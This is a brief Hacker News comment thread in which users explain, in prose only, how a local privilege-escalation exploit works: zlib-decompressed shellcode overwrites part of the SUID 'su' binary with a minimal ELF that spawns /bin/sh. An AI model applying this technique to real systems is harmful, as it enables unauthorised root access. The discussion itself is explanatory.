logoalt Hacker News

not_your_vaseyesterday at 6:24 PM2 repliesview on HN

Is there a readable version of the exploit readily available by any chance? Gotta admit that I failed binary-zip-interpretation-with-naked-eye class twice

Replies

progvalyesterday at 6:34 PM

The binary "zip" isn't the exploit, it's the shellcode. The exploit is the rest, which changes the code of a SUID executable (su).

stackghostyesterday at 8:28 PM

The call to zlib basically overwrites a minimal ELF into a portion of the `su` binary, which exceve's /bin/sh.